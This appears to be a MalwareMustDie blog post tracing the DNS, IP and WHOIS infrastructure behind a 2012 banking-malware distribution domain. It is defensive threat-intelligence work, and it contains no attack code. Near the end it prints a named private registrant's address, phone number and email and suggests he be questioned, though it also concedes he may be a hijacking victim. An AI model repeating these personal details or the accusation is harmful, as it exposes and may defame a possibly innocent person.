To all MalwareMustDie friends! Without you guys, I wouldn't have gotten this far :-) Blake (jsunpack), for the inspiration on the stealer configuration file; @Xylit0l & EP_X0FF of KernelMode, great thanks! YouTube, VirusTotal, MediaFire, Google & Blogger.

Network Analysis..Tracing the Bad guys..

As requested, I investigated the NS used, which leads to someone... Please bear with my text since I posted it from FreeBSD:
// The domain used for the infector is
eaglepointecondo.biz  900 IN  A  59.57.247.185
// ↑This is aimed at the US for sure (see the bank list, 75% are US banks)

// The SOA that was used (mark the TTL refresh time..)
primary name server = ns1.amishshoppe.net
responsible mail addr = (root)
serial  = 1355645102
refresh = 60 (1 min)
retry   = 120 (2 mins)
expire  = 1048576 (12 days 3 hours 16 mins 16 secs)
default TTL = 900 (15 mins) //←this!

// How it resolves from the root:
Tracing to eaglepointecondo.biz[a] via 202.238.95.24, maximum of 1 retries
202.238.95.24 (202.238.95.24) 
 |\___ a.gtld.biz [biz] (156.154.124.65) 
 |     |\___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer 
 |      \___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * 
 |\___ k.gtld.biz [biz] (156.154.128.65) 
 |     |\___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * 
 |      \___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer 
 |\___ f.gtld.biz [biz] (209.173.58.66) 
 |     |\___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * 
 |      \___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer 
 |\___ c.gtld.biz [biz] (156.154.127.65) 
 |     |\___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer 
 |      \___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * 
 |\___ b.gtld.biz [biz] (156.154.125.65) 
 |     |\___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer 
 |      \___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * 
  \___ e.gtld.biz [biz] (156.154.126.65) 
       |\___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer 
        \___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * 

// The history of the infector IP 59.57.247.185 leads to:
eaglepointecondo.org  A  59.57.247.185
pleansantwille.com  A  59.57.247.185
eaglepointecondo.co  A  59.57.247.185
platinumbristol.net  A  59.57.247.185
eaglepointecondo.biz  A  59.57.247.185
sessionid0147239047829578349578239077.pl  A  59.57.247.185

// It uses a Chinese IP:
ASN  |Prefix        |  ASName  |CN  |Domain    |ISP of an IP Address
4134 | 59.56.0.0/14 | CHINANET | CN | XMJL.COM | XIAMEN JINLONGLVXINGCHE FUJIAN PROVINCE

//PoC of this IP infection as additional evidence:
http://urlquery.net/search.php?q=59.57.247.185&type=string&start=2012-12-01&end=2012-12-16&max=300

// These moronz are using the DNS servers below:
ns1.amishshoppe.net.    3600    IN      A       209.140.18.37
ns2.amishshoppe.net.    3600    IN      A       211.27.42.138

// Those DNS servers are in the US & Australia (someone should report this malicious use..)
ASN   |Prefix           |  ASName             | CN | Domain        | ISP of an IP Address
11042 | 209.140.16.0/22 | LANDIS-HOLDINGS-INC | US | NOCDIRECT.COM | LANDIS HOLDINGS INC
9443  | 211.27.32.0/20  | INTERNETPRIMUS-AS   | AU | PRIMUSTEL.COM | PRIMUS TELECOMMUNICATIONS

// Looks like they must have full control of the amishshoppe.net domain to control its DNS:
PoC:
; <<>> DiG 9.8.1-P1 <<>> 209.140.18.37 axfr // no AXFR allowed, so the NS records must have been added directly (caveat: refusing zone transfers is standard hardening and on its own proves nothing about who controls the zone)
;; global options: +cmd
; Transfer failed.
; <<>> DiG 9.8.1-P1 <<>> 211.27.42.138 axfr
;; global options: +cmd
; Transfer failed.

//This infector in WHOIS:
Domain Name:                                 EAGLEPOINTECONDO.BIZ
Domain ID:                                   D52418387-BIZ
Sponsoring Registrar:                        GODADDY.COM, INC.
Name Server:                                 NS1.AMISHSHOPPE.NET
Name Server:                                 NS2.AMISHSHOPPE.NET
Created by Registrar:                        GODADDY.COM, INC.
Last Updated by Registrar:                   GODADDY.COM, INC.
Domain Registration Date:                    Sat Dec 08 00:22:13 GMT 2012
Domain Expiration Date:                      Sat Dec 07 23:59:59 GMT 2013
Domain Last Updated Date:                    Mon Dec 10 19:12:41 GMT 2012

// registered via a WHOIS privacy proxy service....
Registrant Organization:                     Domains By Proxy, LLC
Registrant Address1:                         DomainsByProxy.com
Registrant Address2:                         14747 N Northsight Blvd Suite 111, PMB 309
Registrant City:                             Scottsdale
Registrant State/Province:                   Arizona
Registrant Postal Code:                      85260
Registrant Country:                          United States
Registrant Country Code:                     US
Registrant Phone Number:                     +1.4806242599
Registrant Facsimile Number:                 +1.4806242598

// someone should start questioning Mr. Steve Burandt in the US about this infection...
Domain Name: AMISHSHOPPE.NET
   Registrar: REGISTER.COM, INC.
   Whois Server: whois.register.com
   Referral URL: http://www.register.com
   Name Server: NS1.AMISHSHOPPE.NET
   Name Server: NS2.AMISHSHOPPE.NET
   Status: clientTransferProhibited
   Updated Date: 15-nov-2012  // <== same as the creation date: the NS domain was set up three weeks before the infector domain was registered (08-dec-2012)
   Creation Date: 15-nov-2012
   Expiration Date: 15-nov-2013
   
   Registrant:
      Steve Burandt
      0n430 Peter Rd
      Winfield, IL 60190
      US
      Phone: +1.6304626711
      Email: solaradvent@yahoo.com
↑A strong accusation, I know, but that's what the data says... Can't wait to hear the explanation from this person. Caveat: a registrant whose name servers end up serving a malicious domain can just as well be the victim of a hijacked registrar account, so the WHOIS record alone does not establish involvement.

#MalwareMustDie!
